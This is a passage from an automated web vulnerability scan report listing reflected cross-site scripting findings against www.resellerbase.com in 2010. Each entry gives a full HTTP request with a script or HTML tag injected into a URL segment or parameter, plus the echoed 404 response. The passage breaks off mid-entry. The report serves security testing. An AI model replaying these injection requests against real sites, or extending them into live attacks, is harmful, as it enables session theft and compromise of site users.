<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1835fcb<script>alert(1)</script>9ccdc8178ba/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1542. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e15c9<script>alert(1)</script>75c7daef5eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themese15c9<script>alert(1)</script>75c7daef5eb/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themese15c9<script>alert(1)</script>75c7daef5eb/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1543. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1db5e<script>alert(1)</script>eab3fc2815f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos1db5e<script>alert(1)</script>eab3fc2815f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos1db5e<script>alert(1)</script>eab3fc2815f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1544. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4e14c<script>alert(1)</script>1b633adc14d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/search.php4e14c<script>alert(1)</script>1b633adc14d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/search.php4e14c<script>alert(1)</script>1b633adc14d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1545. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4e798<a>ab03dcb2492 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search4e798<a>ab03dcb2492&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search4e798<a>ab03dcb2492&opt=2 was not found on this server.</p>
...[SNIP]...

2.1546. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f7c0c<a>62f6d055c3a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/search.php?keyword=search...f7c0c<a>62f6d055c3a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/search.php?keyword=search...f7c0c<a>62f6d055c3a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1547. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7a6cc<script>alert(1)</script>42343590804 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&7a6cc<script>alert(1)</script>42343590804=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&7a6cc<script>alert(1)</script>42343590804=1 was not found on this server.</p>
...[SNIP]...

2.1548. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5fe62<a>9cf0992b1ff was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=25fe62<a>9cf0992b1ff HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=25fe62<a>9cf0992b1ff was not found on this server.</p>
...[SNIP]...

2.1549. http://www.resellerbase.com/detail/18/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ee26<script>alert(1)</script>bc3dff118e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4ee26<script>alert(1)</script>bc3dff118e4/18/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4ee26<script>alert(1)</script>bc3dff118e4/18/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1550. http://www.resellerbase.com/detail/18/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72e03<script>alert(1)</script>fb2ef88b63b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1872e03<script>alert(1)</script>fb2ef88b63b/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1872e03<script>alert(1)</script>fb2ef88b63b/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1551. http://www.resellerbase.com/detail/18/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6be00<script>alert(1)</script>37ffdd5f9a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes6be00<script>alert(1)</script>37ffdd5f9a2/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes6be00<script>alert(1)</script>37ffdd5f9a2/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1552. http://www.resellerbase.com/detail/18/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9bb13<script>alert(1)</script>22193e02fa9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/search.php9bb13<script>alert(1)</script>22193e02fa9?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/search.php9bb13<script>alert(1)</script>22193e02fa9?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1553. http://www.resellerbase.com/detail/18/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 110db<a>d713fb801f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/search.php?keyword=search...&Submit3=Search110db<a>d713fb801f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/search.php?keyword=search...&Submit3=Search110db<a>d713fb801f&opt=2 was not found on this server.</p>
...[SNIP]...

2.1554. http://www.resellerbase.com/detail/18/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bf89f<a>01c3d9fdbc9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/search.php?keyword=search...bf89f<a>01c3d9fdbc9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/search.php?keyword=search...bf89f<a>01c3d9fdbc9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1555. http://www.resellerbase.com/detail/18/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 87094<script>alert(1)</script>bb99055ba5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=2&87094<script>alert(1)</script>bb99055ba5b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=2&87094<script>alert(1)</script>bb99055ba5b=1 was not found on this server.</p>
...[SNIP]...

2.1556. http://www.resellerbase.com/detail/18/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9c6dc<a>943fe4344e8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=29c6dc<a>943fe4344e8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=29c6dc<a>943fe4344e8 was not found on this server.</p>
...[SNIP]...

2.1557. http://www.resellerbase.com/detail/18/worlddatingpartners-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/worlddatingpartners-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73515<script>alert(1)</script>ad7a390f648 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail73515<script>alert(1)</script>ad7a390f648/18/worlddatingpartners-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail73515<script>alert(1)</script>ad7a390f648/18/worlddatingpartners-com.html was not found on this server.</p>
...[SNIP]...

2.1558. http://www.resellerbase.com/detail/18/worlddatingpartners-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/worlddatingpartners-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a3d7<a>a3083c22d9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/185a3d7<a>a3083c22d9b/worlddatingpartners-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/185a3d7<a>a3083c22d9b/worlddatingpartners-com.html was not found on this server.</p>
...[SNIP]...

2.1559. http://www.resellerbase.com/detail/18/worlddatingpartners-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/worlddatingpartners-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ed2e8<script>alert(1)</script>fe69a678196 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/ed2e8<script>alert(1)</script>fe69a678196 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/ed2e8<script>alert(1)</script>fe69a678196 was not found on this server.</p>
...[SNIP]...

2.1560. http://www.resellerbase.com/detail/19/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
